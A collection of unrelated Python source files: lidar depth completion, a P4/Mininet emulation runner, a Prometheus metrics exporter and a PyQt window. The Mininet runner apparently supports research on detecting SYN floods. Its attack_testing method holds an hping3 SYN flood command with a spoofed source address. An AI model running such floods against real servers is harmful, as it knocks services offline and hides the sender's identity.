assert self.vwriter.isOpened()
self.vwriter.write(img)
logging.info('Video recorder released!')
if self.vwriter is not None:
self.vwriter.release()
def on_exit(self):
try:
# Try putting a None into the output queue so the self.vwriter will
# be released after all queue frames have been written to file.
self.queue.put(None, timeout=1)
self.t_record.join(timeout=1)
except Full:
pass
if self.t_record.is_alive():
# Force to release self.vwriter
logging.info('Video recorder forced release!')
if self.vwriter is not None:
self.vwriter.release()
|
complete_knn_train_28.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 19:57:23 2020
@author: kerui
"""
import sys
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
# 将一个点云的值赋值为离他最近的三个有值点的加权值
import numpy as np
import cv2
import kdtree as KDT
import data_provider
#import config
import velo_2_cam
import os
import glob
import cv2
#import ransac
import time
import multiprocessing
def generate_coor(x_min, x_max, y_min, y_max):
'''generate 2D coor'''
x = range(x_min, x_max)
y = range(y_min, y_max)
X, Y = np.meshgrid(x, y) # 2D grid
X, Y = X.flatten(), Y.flatten()
coordinate = [[x,y] for x, y in zip(X, Y)]
return (coordinate, x_min, x_max, y_min, y_max)
def complete_knn(data_dir, image_path, img_size, pc):
#print(pc[0].max(),pc[1].max())
start1 = time.perf_counter()
# create single_channel (gray) images as the blank maps
intensity_img_gray = np.zeros(img_size, dtype=np.uint8)
height_img_gray = np.zeros(img_size, dtype=np.uint8)
depth_img_gray = np.zeros(img_size, dtype=np.uint8)
# reshape lidar to img_size
pc[0] = pc[0] * 512 / 1242 # normalize to 0-512
pc[1] = pc[1] * 256 / 375 # normalize to 0-256
#print(pc[0].max(),pc[1].max())
# locate the points on the maps
for i in range(np.size(pc, 1)):
(x,y) = (int(pc[1, i]), int(pc[0, i]))
if intensity_img_gray[x,y] == 0:
# intensity
intensity_img_gray[x,y] = int(pc[3, i]*255) # times 255 to normalize
# height
height_img_gray[x,y] = int((pc[2, i]+3)*85) # +3 to ensure positive; times 255/3=85 to normalize
# depth 3D
depth_img_gray[x,y] = int(pc[5, i]*3) # times 255/80->3 to normalize
# generate blocks to fill
kd_block = []
for patch in range(0,4):
x_0 = 256
x_1 = 200
x_2 = 140
x_3 = 0
y_min = patch * 128
y_max = y_min + 128
kd_block.append(generate_coor(x_min=x_1, x_max=x_0, y_min=y_min, y_max=y_max))
kd_block.append(generate_coor(x_min=x_2, x_max=x_1, y_min=y_min, y_max=y_max))
kd_block.append(generate_coor(x_min=x_3, x_max=x_2, y_min=y_min, y_max=y_max))
# build kd-tree
start2 = time.perf_counter()
kdtree_block = []
for block in kd_block:
coordinate, x_min, x_max, y_min, y_max = block
x_value = range(max(0,x_min-16), min(x_max+16,256))
y_value = range(max(y_min-16,0), min(y_max+16,512)) # bounding
X_value, Y_value = np.meshgrid(x_value, y_value) # 2D grid
X_value, Y_value = X_value.flatten(), Y_value.flatten()
# acquire the index of original lidar projection map
value_coordinate = [[x,y] for x, y in zip(X_value, Y_value) if intensity_img_gray[x,y] > 0]
if (len(value_coordinate)<10):
kdtree_block.append((None, None))
else:
kdtree = KDT.create(value_coordinate)
kdtree_block.append((value_coordinate, kdtree))
start3 = time.perf_counter()
# store the weight and coordinate of 3 nearest points in a dictionary
neighbor_dict = {}
for i in range(len(kd_block)):
#print('start querying %d block' %i)
coor = kd_block[i][0] # coordinate
value_coor, tree = kdtree_block[i] # value_coordinate, kdtree
if value_coor is not None: # safety sheck
for x, y in coor:
# query existing points
if [x, y] in value_coor:
continue
else:
a1, b1, c1= tree.search_knn([x, y], 3)
# query neighbor points
a = a1[0].data
b = b1[0].data
c = c1[0].data
# compute the distance
da = a1[1]
db = b1[1]
dc = c1[1]
# compute the weight
d_s = da + db + dc
wa, wb, wc = da/d_s, db/d_s, dc/d_s
# add to neighbor_dict
neighbor_dict[(x, y)] = (a, b, c, wa, wb, wc)
start4 = time.perf_counter()
# pointcloud completion
for block in range(len(kd_block)):
#print('start filling %d block' %block)
if kdtree_block[block][0] is not None:
coor_ = kd_block[block]
for i, j in coor_[0]:
if(intensity_img_gray[i, j] == 0):
a, b, c, da_, db_, dc_ = neighbor_dict[(i,j)]
A = intensity_img_gray[tuple(a)]
B = intensity_img_gray[tuple(b)]
C = intensity_img_gray[tuple(c)]
intensity_img_gray[i,j] = da_*A + db_*B + dc_ *C # ABC are intensity on the 3 points
A = height_img_gray[tuple(a)]
B = height_img_gray[tuple(b)]
C = height_img_gray[tuple(c)]
height_img_gray[i,j] = da_*A + db_*B + dc_ *C # ABC are height on the 3 points
A = depth_img_gray[tuple(a)]
B = depth_img_gray[tuple(b)]
C = depth_img_gray[tuple(c)]
depth_img_gray[i,j] = da_*A + db_*B + dc_ *C # ABC are depth on the 3 points
start5 = time.perf_counter()
# generating merged data
merge = cv2.merge([intensity_img_gray, height_img_gray, depth_img_gray])
cv2.imwrite(data_dir+'velodyne_points/knn_results/'+image_path[-14:], merge)
elapsed = []
for i in [start1,start2,start3,start4,start5]:
elapsed.append(time.perf_counter() - i)
print("Time used:",elapsed)
def completion(data_dir, path_pc, path_image, path_calib):
'''the main function of completion'''
'''load the calib file'''
param = data_provider.read_calib(path_calib, [0,1,2,3])
cam2img = param[0].reshape([3,4]) # from camera-view to pixels
cam2cam = param[1].reshape([3,3]) # rectify camera-view
R = param[2].reshape([3,3])
T = param[3].reshape([3,-1])
vel2cam = np.append(R,T,axis=1) # from lidar-view to camera-view: [R;T] in raw_data
'''project and complete_knn'''
i = 0
total_num = len(path_image)
est_time = 0
for image_path, pc_path in zip(path_image, path_pc):
i+=1
start = time.perf_counter()
print('-'*30, 'generating %d data of' %i,str(total_num), '-'*30)
# check the existing completed files
check_path = os.path.join(data_dir,'velodyne_points/knn_results/',image_path[-14:])
#print(check_path)
if os.path.exists(check_path):
print('pass file {}'.format(image_path))
total_num -= 1
continue
# 读取二进制点云文件
lidar = data_provider.read_pc2array(pc_path,
height=[-2,-1], #[-1.75,-1.55]
font=True)
lidar = np.array(lidar)
#lidar = ransac.ransac(lidar)
image_name = image_path.split('\\')[-1]
img = cv2.imread(image_name)
img_shape = img.shape[:2] # (375,1242)
img_shape_inverse = (img_shape[1],img_shape[0])
cam_coor, pixel = velo_2_cam.lidar_to_camera_project(trans_mat=vel2cam,
rec_mat=cam2cam,
cam_mat=cam2img,
data=lidar,
pixel_range=img_shape_inverse
)
# pixel:=[x,y,h,r,d2,d3], x = 0-1242, y = 0-375
#print(pixel[2].max(),pixel[2].min(),pixel[3].max(),pixel[3].min(),pixel[4].max(),pixel[4].min())
print(image_name)
complete_knn(data_dir=data_dir, image_path=image_name, img_size=(256,512), pc=pixel)
print('estimated time left {}'.format(\
(time.perf_counter()-start)*(total_num-i)/60))
#break
#print(pixel[3].min(),pixel[3].max())
def complete_func(data_dir, calib):
DIR1 = data_dir[0]
DIR2 = data_dir[1]
PATH_pc1 = sorted(glob.glob(os.path.join(DIR1, 'velodyne_points/data/*.bin')))
PATH_pc2 = sorted(glob.glob(os.path.join(DIR2, 'velodyne_points/data/*.bin')))
PATH_image1 = sorted(glob.glob(os.path.join(DIR1, 'image_02/data/*.png')))
PATH_image2 = sorted(glob.glob(os.path.join(DIR2, 'image_02/data/*.png')))
#completion(data_dir=data_dir, path_pc=PATH_pc, path_image=PATH_image, path_calib=calib)
# multi-processor should be less than cpu numbers
# process dataset1
p11 = multiprocessing.Process(target=completion, args=(DIR1,PATH_pc1[:215],PATH_image1[:215],calib))
p12 = multiprocessing.Process(target=completion, args=(DIR1,PATH_pc1[215:],PATH_image1[215:],calib))
# process dataset2
p21 = multiprocessing.Process(target=completion, args=(DIR2,PATH_pc2[:215],PATH_image2[:215],calib))
p22 = multiprocessing.Process(target=completion, args=(DIR2,PATH_pc2[215:],PATH_image2[215:],calib))
p11.start()
p12.start()
p21.start()
p22.start()
if __name__ == "__main__":
start = time.perf_counter()
data_dir1 = '2011_09_26_drive_0028_sync/'
data_dir2 = '2011_09_26_drive_0029_sync/'
calib_file = '2011_09_26/calib.txt' # use the same calib file for all data record at 2011_09_26
complete_func(data_dir=(data_dir1,data_dir2), calib=calib_file) # data_dir2
elapsed = (time.perf_counter() - start)
print("Time used:",elapsed)
|
syn_exercise.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Adapted by Robert MacDavid (macdavid@cs.princeton.edu) from scripts found in
# the p4app repository (https://github.com/p4lang/p4app)
#
# We encourage you to dissect this script to better understand the BMv2/Mininet
# environment used by the P4 tutorial.
#
import os, sys, json, subprocess, re, argparse
from time import sleep
import time
import threading
from p4_mininet import P4Switch, P4Host, P4HostV6, P4RuntimeSwitch
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink
from mininet.cli import CLI
import p4runtime_lib.simple_controller
def configureP4Switch(**switch_args):
""" Helper class that is called by mininet to initialize
the virtual P4 switches. The purpose is to ensure each
switch's thrift server is using a unique port.
"""
if "sw_path" in switch_args and 'grpc' in switch_args['sw_path']:
# If grpc appears in the BMv2 switch target, we assume will start P4Runtime
class ConfiguredP4RuntimeSwitch(P4RuntimeSwitch):
def __init__(self, *opts, **kwargs):
kwargs.update(switch_args)
P4RuntimeSwitch.__init__(self, *opts, **kwargs)
def describe(self):
print '====================================='
print 'Switch Device ID: %s' % str(self.device_id)
print 'Switch CPU port: %s' % str(self.cpu_port)
print "%s -> gRPC port: %d" % (self.name, self.grpc_port)
return ConfiguredP4RuntimeSwitch
else:
class ConfiguredP4Switch(P4Switch):
next_thrift_port = 9090
def __init__(self, *opts, **kwargs):
global next_thrift_port
kwargs.update(switch_args)
kwargs['thrift_port'] = ConfiguredP4Switch.next_thrift_port
ConfiguredP4Switch.next_thrift_port += 1
P4Switch.__init__(self, *opts, **kwargs)
def describe(self):
print "%s -> Thrift port: %d" % (self.name, self.thrift_port)
return ConfiguredP4Switch
class ExerciseTopo(Topo):
""" The mininet topology class for the P4 tutorial exercises.
A custom class is used because the exercises make a few topology
assumptions, mostly about the IP and MAC addresses.
"""
def __init__(self, hosts, switches, links, log_dir, host_mode, **opts):
Topo.__init__(self, **opts)
host_links = []
switch_links = []
self.sw_port_mapping = {}
for link in links:
if link['node1'][0] == 'h':
host_links.append(link)
else:
switch_links.append(link)
# link_sort_key = lambda x: x['node1'] + x['node2']
# # Links must be added in a sorted order so bmv2 port numbers are predictable
# host_links.sort(key=link_sort_key)
# switch_links.sort(key=link_sort_key)
for sw in switches:
self.addSwitch(sw, log_file="%s/%s.log" %(log_dir, sw))
for host in hosts:
print(host)
if host_mode is 4:
host_index = 0
for link in host_links:
host_name = link['node1']
host_sw = link['node2']
host_num = int(host_name[1:])
sw_num = int(host_sw[1:])
# host_ip = "10.0.%d.%d" % (sw_num, host_num)
host_ip = hosts[host_index][1]
host_mac = '00:00:00:00:%02x:%02x' % (sw_num, host_num)
# Each host IP should be /24, so all exercise traffic will use the
# default gateway (the switch) without sending ARP requests.
self.addHost(host_name, ip=host_ip+'/32', mac=host_mac)
self.addLink(host_name, host_sw,
delay=link['latency'], bw=link['bandwidth'],
addr1=host_mac, addr2=host_mac)
self.addSwitchPort(host_sw, host_name)
host_index = host_index+1
for link in switch_links:
self.addLink(link['node1'], link['node2'],
delay=link['latency'], bw=link['bandwidth'])
self.addSwitchPort(link['node1'], link['node2'])
self.addSwitchPort(link['node2'], link['node1'])
self.printPortMapping()
def addSwitchPort(self, sw, node2):
if sw not in self.sw_port_mapping:
self.sw_port_mapping[sw] = []
portno = len(self.sw_port_mapping[sw])+1
self.sw_port_mapping[sw].append((portno, node2))
def printPortMapping(self):
print "Switch port mapping:"
for sw in sorted(self.sw_port_mapping.keys()):
print "%s: " % sw,
for portno, node2 in self.sw_port_mapping[sw]:
print "%d:%s\t" % (portno, node2),
print
class ExerciseRunner:
"""
Attributes:
log_dir : string // directory for mininet log files
pcap_dir : string // directory for mininet switch pcap files
quiet : bool // determines if we print logger messages
hosts : list<string> // list of mininet host names
switches : dict<string, dict> // mininet host names and their associated properties
links : list<dict> // list of mininet link properties
switch_json : string // json of the compiled p4 example
bmv2_exe : string // name or path of the p4 switch binary
topo : Topo object // The mininet topology instance
net : Mininet object // The mininet instance
host_mode: integer // IPv4/IPv6 specification
"""
def logger(self, *items):
if not self.quiet:
print(' '.join(items))
def formatLatency(self, l):
""" Helper method for parsing link latencies from the topology json. """
if isinstance(l, (str, unicode)):
return l
else:
return str(l) + "ms"
def __init__(self, topo_file, log_dir, pcap_dir,
switch_json, bmv2_exe='simple_switch', quiet=False, host_mode=4):
""" Initializes some attributes and reads the topology json. Does not
actually run the exercise. Use run_exercise() for that.
Arguments:
topo_file : string // A json file which describes the exercise's
mininet topology.
log_dir : string // Path to a directory for storing exercise logs
pcap_dir : string // Ditto, but for mininet switch pcap files
switch_json : string // Path to a compiled p4 json for bmv2
bmv2_exe : string // Path to the p4 behavioral binary
quiet : bool // Enable/disable script debug messages
"""
self.quiet = quiet
self.logger('Reading topology file.')
with open(topo_file, 'r') as f:
topo = json.load(f)
self.hosts = topo['hosts']
self.switches = topo['switches']
self.links = self.parse_links(topo['links'])
# Ensure all the needed directories exist and are directories
for dir_name in [log_dir, pcap_dir]:
if not os.path.isdir(dir_name):
if os.path.exists(dir_name):
raise Exception("'%s' exists and is not a directory!" % dir_name)
os.mkdir(dir_name)
self.log_dir = log_dir
self.pcap_dir = pcap_dir
self.switch_json = switch_json
self.bmv2_exe = bmv2_exe
# IPv4/6
self.host_mode = host_mode
def run_exercise(self):
""" Sets up the mininet instance, programs the switches,
and starts the mininet CLI. This is the main method to run after
initializing the object.
"""
# Initialize mininet with the topology specified by the config
self.create_network()
self.net.start()
sleep(1)
# some programming that must happen after the net has started
self.program_hosts()
self.program_switches()
# wait for that to finish. Not sure how to do this better
print "please open controller"
s1 = self.net.get(self.topo.switches()[0])
s22 = self.net.get(self.topo.switches()[21])
s23 = self.net.get(self.topo.switches()[22])
s2 = self.net.get(self.topo.switches()[1])
s4 = self.net.get(self.topo.switches()[3])
s5 = self.net.get(self.topo.switches()[4])
sleep(15)
s1.cmdPrint("python sniffer.py s1 1 >sniffer/s1.txt &")
s22.cmdPrint("python sniffer.py s22 1 >sniffer/r1.txt &")
s23.cmdPrint("python sniffer.py s23 1 >sniffer/r2.txt &")
s2.cmdPrint("python sniffer.py s2 1 >sniffer/s2.txt &")
s4.cmdPrint("python sniffer.py s4 2 >sniffer/s3.txt &")
s5.cmdPrint("python sniffer.py s5 2 >sniffer/s4.txt &")
self.start_time=time.time()
normal = threading.Thread(target=self.normal_testing)
normal.start()
# a2 = threading.Thread(target=self.attack_testing)
# a2.start()
# self.do_net_cli()
# stop right after the CLI is exited
normal.join()
# a2.join()
while True:
if time.time()-self.start_time > 200:
self.net.stop()
def parse_links(self, unparsed_links):
""" Given a list of links descriptions of the form [node1, node2, latency, bandwidth]
with the latency and bandwidth being optional, parses these descriptions
into dictionaries and store them as self.links
"""
links = []
for link in unparsed_links:
# make sure each link's endpoints are ordered alphabetically
s, t, = link[0], link[1]
if s > t:
s,t = t,s
link_dict = {'node1':s,
'node2':t,
'latency':'0ms',
'bandwidth':None
}
if len(link) > 2:
link_dict['latency'] = self.formatLatency(link[2])
if len(link) > 3:
link_dict['bandwidth'] = link[3]
if link_dict['node1'][0] == 'h':
assert link_dict['node2'][0] == 's', 'Hosts should be connected to switches, not ' + str(link_dict['node2'])
links.append(link_dict)
return links
def create_network(self):
""" Create the mininet network object, and store it as self.net.
Side effects:
- Mininet topology instance stored as self.topo
- Mininet instance stored as self.net
"""
self.logger("Building mininet topology.")
self.topo = ExerciseTopo(self.hosts, self.switches.keys(), self.links, self.log_dir,self.host_mode)
switchClass = configureP4Switch(
sw_path=self.bmv2_exe,
json_path=self.switch_json,
log_console=True,
pcap_dump=self.pcap_dir)
if self.host_mode is 4:
self.net = Mininet(topo = self.topo,
link = TCLink,
host = P4Host,
switch = switchClass,
controller = None)
if self.host_mode is 6:
self.net = Mininet(topo = self.topo,
link = TCLink,
host = P4HostV6,
switch = switchClass,
controller = None)
def program_switch_p4runtime(self, sw_name, sw_dict):
""" This method will use P4Runtime to program the switch using the
content of the runtime JSON file as input.
"""
sw_obj = self.net.get(sw_name)
grpc_port = sw_obj.grpc_port
device_id = sw_obj.device_id
runtime_json = sw_dict['runtime_json']
self.logger('Configuring switch %s using P4Runtime with file %s' % (sw_name, runtime_json))
with open(runtime_json, 'r') as sw_conf_file:
outfile = '%s/%s-p4runtime-requests.txt' %(self.log_dir, sw_name)
p4runtime_lib.simple_controller.program_switch(
addr='127.0.0.1:%d' % grpc_port,
device_id=device_id,
sw_conf_file=sw_conf_file,
workdir=os.getcwd(),
proto_dump_fpath=outfile)
def program_switch_cli(self, sw_name, sw_dict):
""" This method will start up the CLI and use the contents of the
command files as input.
"""
cli = 'simple_switch_CLI'
# get the port for this particular switch's thrift server
sw_obj = self.net.get(sw_name)
thrift_port = sw_obj.thrift_port
cli_input_commands = sw_dict['cli_input']
self.logger('Configuring switch %s with file %s' % (sw_name, cli_input_commands))
with open(cli_input_commands, 'r') as fin:
cli_outfile = '%s/%s_cli_output.log'%(self.log_dir, sw_name)
with open(cli_outfile, 'w') as fout:
subprocess.Popen([cli, '--thrift-port', str(thrift_port)],
stdin=fin, stdout=fout)
def program_switches(self):
""" This method will program each switch using the BMv2 CLI and/or
P4Runtime, depending if any command or runtime JSON files were
provided for the switches.
"""
for sw_name, sw_dict in self.switches.iteritems():
if 'cli_input' in sw_dict:
self.program_switch_cli(sw_name, sw_dict)
if 'runtime_json' in sw_dict:
self.program_switch_p4runtime(sw_name, sw_dict)
def program_hosts(self):
""" Adds static ARP entries and default routes to each mininet host.
Assumes:
- A mininet instance is stored as self.net and self.net.start() has
been called.
"""
for host_name in self.topo.hosts():
h = self.net.get(host_name)
h_iface = h.intfs.values()[0]
link = h_iface.link
sw_iface = link.intf1 if link.intf1 != h_iface else link.intf2
# phony IP to lie to the host about
host_id = int(host_name[1:])
sw_ip = '10.0.%d.254' % host_id
if self.host_mode is 6:
sw_v6_ip = '1000::%d:1' % host_id
# Ensure each host's interface name is unique, or else
# mininet cannot shutdown gracefully
h.defaultIntf().rename('%s-eth0' % host_name)
# static arp entries and default routes
h.cmd('arp -i %s -s %s %s' % (h_iface.name, sw_ip, sw_iface.mac))
h.cmd('ethtool --offload %s rx off tx off' % h_iface.name)
h.cmd('ip route add %s dev %s' % (sw_ip, h_iface.name))
if self.host_mode is 6:
h.cmd('ip -6 route add %s dev %s' % (sw_v6_ip, h_iface.name))
h.setDefaultRoute("via %s" % sw_ip)
#if self.host_mode is 6:
# h.setDefaultRoute("via %s" % sw_v6_ip)
# syn test setting
server = self.net.get(self.topo.hosts()[0])
server.cmd("cd ./file")
server.cmd("python -m SimpleHTTPServer 80 &")
def normal_testing(self):
h = self.net.get(self.topo.hosts()[4])
while True:
# for host_name in self.topo.hosts()[1:10]:
if time.time()-self.start_time >= 200:
print "normal_stop"
return
h.cmd("curl 10.0.1.1 &")
sleep(20)
# if time.time()-self.start_time >= 150:
# print "normal_stop"
# return
# h = self.net.get(self.topo.hosts()[14])
# h.cmd("curl 10.0.1.1 &")
# sleep(0.5)
def attack_testing(self):
# sleep(60)
h = self.net.get(self.topo.hosts()[1])
# h2 = self.net.get(self.topo.hosts()[1])
# h3 = self.net.get(self.topo.hosts()[2])
# h4 = self.net.get(self.topo.hosts()[3])
# h5 = self.net.get(self.topo.hosts()[4])
while True:
if time.time()-self.start_time > 200:
print "attack_stop"
return
h.cmd("hping3 10.0.1.1 -S -p 80 -i u40000 -a 11.0.0.1")
# h2.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.0.0."+str(index))
# h3.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.0.1."+str(index))
# h4.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.0.2."+str(index))
# h5.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.1.0."+str(index))
def do_net_cli(self):
""" Starts up the mininet CLI and prints some helpful output.
Assumes:
- A mininet instance is stored as self.net and self.net.start() has
been called.
"""
for s in self.net.switches:
s.describe()
for h in self.net.hosts:
h.describe()
self.logger("Starting mininet CLI")
# Generate a message that will be printed by the Mininet CLI to make
# interacting with the simple switch a little easier.
print('')
print('======================================================================')
print('Welcome to the BMV2 Mininet CLI!')
print('======================================================================')
print('Your P4 program is installed into the BMV2 software switch')
print('and your initial runtime configuration is loaded. You can interact')
print('with the network using the mininet CLI below.')
print('')
if self.switch_json:
print('To inspect or change the switch configuration, connect to')
print('its CLI from your host operating system using this command:')
print(' simple_switch_CLI --thrift-port <switch thrift port>')
print('')
print('To view a switch log, run this command from your host OS:')
print(' tail -f %s/<switchname>.log' % self.log_dir)
print('')
print('To view the switch output pcap, check the pcap files in %s:' % self.pcap_dir)
print(' for example run: sudo tcpdump -xxx -r s1-eth1.pcap')
print('')
if 'grpc' in self.bmv2_exe:
print('To view the P4Runtime requests sent to the switch, check the')
print('corresponding txt file in %s:' % self.log_dir)
print(' for example run: cat %s/s1-p4runtime-requests.txt' % self.log_dir)
print('')
CLI(self.net)
def get_args():
cwd = os.getcwd()
default_logs = os.path.join(cwd, 'logs')
default_pcaps = os.path.join(cwd, 'pcaps')
parser = argparse.ArgumentParser()
parser.add_argument('-q', '--quiet', help='Suppress log messages.',
action='store_true', required=False, default=False)
parser.add_argument('-t', '--topo', help='Path to topology json',
type=str, required=False, default='./topology.json')
parser.add_argument('-l', '--log-dir', type=str, required=False, default=default_logs)
parser.add_argument('-p', '--pcap-dir', type=str, required=False, default=default_pcaps)
parser.add_argument('-j', '--switch_json', type=str, required=False)
parser.add_argument('-b', '--behavioral-exe', help='Path to behavioral executable',
type=str, required=False, default='simple_switch')
parser.add_argument('-m', '--host_mode', help='Mode of Host, IPv4(4) or IPv6(6).',
type=int, required=False, default=4)
return parser.parse_args()
if __name__ == '__main__':
# from mininet.log import setLogLevel
# setLogLevel("info")
args = get_args()
exercise = ExerciseRunner(args.topo, args.log_dir, args.pcap_dir,
args.switch_json, args.behavioral_exe, args.quiet,args.host_mode)
exercise.run_exercise()
|
_exposition.py
|
# Copyright 2015-2019 Prometheus Python Client Developers
# Copyright 2019 Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This code is based off `prometheus_client/exposition.py` from version 0.7.1.
Due to the renaming of metrics in prometheus_client 0.4.0, this customised
vendoring of the code will emit both the old versions that Synapse dashboards
expect, and the newer "best practice" version of the up-to-date official client.
"""
import math
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from typing import Dict, List
from urllib.parse import parse_qs, urlparse
from prometheus_client import REGISTRY
from twisted.web.resource import Resource
from synapse.util import caches
CONTENT_TYPE_LATEST = str("text/plain; version=0.0.4; charset=utf-8")
INF = float("inf")
MINUS_INF = float("-inf")
def floatToGoString(d):
d = float(d)
if d == INF:
return "+Inf"
elif d == MINUS_INF:
return "-Inf"
elif math.isnan(d):
return "NaN"
else:
s = repr(d)
dot = s.find(".")
# Go switches to exponents sooner than Python.
# We only need to care about positive values for le/quantile.
if d > 0 and dot > 6:
mantissa = "{0}.{1}{2}".format(s[0], s[1:dot], s[dot + 1 :]).rstrip("0.")
return "{0}e+0{1}".format(mantissa, dot - 1)
return s
def sample_line(line, name):
if line.labels:
labelstr = "{{{0}}}".format(
",".join(
[
'{0}="{1}"'.format(
k,
v.replace("\\", r"\\").replace("\n", r"\n").replace('"', r"\""),
)
for k, v in sorted(line.labels.items())
]
)
)
else:
labelstr = ""
timestamp = ""
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = " {0:d}".format(int(float(line.timestamp) * 1000))
return "{0}{1} {2}{3}\n".format(
name, labelstr, floatToGoString(line.value), timestamp
)
def generate_latest(registry, emit_help=False):
# Trigger the cache metrics to be rescraped, which updates the common
# metrics but do not produce metrics themselves
for collector in caches.collectors_by_name.values():
collector.collect()
output = []
for metric in registry.collect():
if not metric.samples:
# No samples, don't bother.
continue
mname = metric.name
mnewname = metric.name
mtype = metric.type
# OpenMetrics -> Prometheus
if mtype == "counter":
mnewname = mnewname + "_total"
elif mtype == "info":
mtype = "gauge"
mnewname = mnewname + "_info"
elif mtype == "stateset":
mtype = "gauge"
elif mtype == "gaugehistogram":
mtype = "histogram"
elif mtype == "unknown":
mtype = "untyped"
# Output in the old format for compatibility.
if emit_help:
output.append(
"# HELP {0} {1}\n".format(
mname,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0} {1}\n".format(mname, mtype))
om_samples = {} # type: Dict[str, List[str]]
for s in metric.samples:
for suffix in ["_created", "_gsum", "_gcount"]:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
# (these come from gaugehistograms which don't get renamed,
# so no need to faff with mnewname)
om_samples.setdefault(suffix, []).append(sample_line(s, s.name))
break
else:
newname = s.name.replace(mnewname, mname)
if ":" in newname and newname.endswith("_total"):
newname = newname[: -len("_total")]
output.append(sample_line(s, newname))
for suffix, lines in sorted(om_samples.items()):
if emit_help:
output.append(
"# HELP {0}{1} {2}\n".format(
metric.name,
suffix,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0}{1} gauge\n".format(metric.name, suffix))
output.extend(lines)
# Get rid of the weird colon things while we're at it
if mtype == "counter":
mnewname = mnewname.replace(":total", "")
mnewname = mnewname.replace(":", "_")
if mname == mnewname:
continue
# Also output in the new format, if it's different.
if emit_help:
output.append(
"# HELP {0} {1}\n".format(
mnewname,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0} {1}\n".format(mnewname, mtype))
for s in metric.samples:
# Get rid of the OpenMetrics specific samples (we should already have
# dealt with them above anyway.)
for suffix in ["_created", "_gsum", "_gcount"]:
if s.name == metric.name + suffix:
break
else:
output.append(
sample_line(s, s.name.replace(":total", "").replace(":", "_"))
)
return "".join(output).encode("utf-8")
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
registry = self.registry
params = parse_qs(urlparse(self.path).query)
if "help" in params:
emit_help = True
else:
emit_help = False
try:
output = generate_latest(registry, emit_help=emit_help)
except Exception:
self.send_error(500, "error generating metric output")
raise
self.send_response(200)
self.send_header("Content-Type", CONTENT_TYPE_LATEST)
self.send_header("Content-Length", str(len(output)))
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object), {"registry": registry})
return MyMetricsHandler
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
# Enabling daemon threads virtually makes ``_ThreadingSimpleServer`` the
# same as Python 3.7's ``ThreadingHTTPServer``.
daemon_threads = True
def start_http_server(port, addr="", registry=REGISTRY):
"""Starts an HTTP server for prometheus metrics as a daemon thread"""
CustomMetricsHandler = MetricsHandler.factory(registry)
httpd = _ThreadingSimpleServer((addr, port), CustomMetricsHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
class MetricsResource(Resource):
"""
Twisted ``Resource`` that serves prometheus metrics.
"""
isLeaf = True
def __init__(self, registry=REGISTRY):
self.registry = registry
def render_GET(self, request):
request.setHeader(b"Content-Type", CONTENT_TYPE_LATEST.encode("ascii"))
response = generate_latest(self.registry)
request.setHeader(b"Content-Length", str(len(response)))
return response
|
LCEOWindow.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5 import QtWidgets, QtGui
from PyQt5.QtWidgets import *
from GUI.CEOWindow import Design_CEOWindow
import sys
from Controllers import CEOControl
import win32com.client
import threading
import random
class CEOWindow(Design_CEOWindow):
def __init__(self,ID, parent=None):
super().__init__(parent)
self.__ID = ID
self.__control = CEOControl(ID)
self.speaker = win32com.client.Dispatch("SAPI.SpVoice")
self.btnAllShop.clicked.connect(lambda: threading.Thread(target=lambda: self.speaker.Speak("全部店铺")).start())
self.btnMyShop.clicked.connect(lambda: threading.Thread(target=lambda: self.speaker.Speak("审核合同")).start())
self.btnInf.clicked.connect(lambda: threading.Thread(target=lambda: self.speaker.Speak("我的信息")).start())
self.__contracts = self.__control.get_all_contracts()
self.__receipts = self.__control.get_all_receipts()
self.__receivables = self.__control.get_all_receivable()
self.pushButtonShop_01.clicked.connect(lambda :self.set_information(1))
self.pushButtonShop_02.clicked.connect(lambda :self.set_information(2))
self.pushButtonShop_03.clicked.connect(lambda :self.set_information(3))
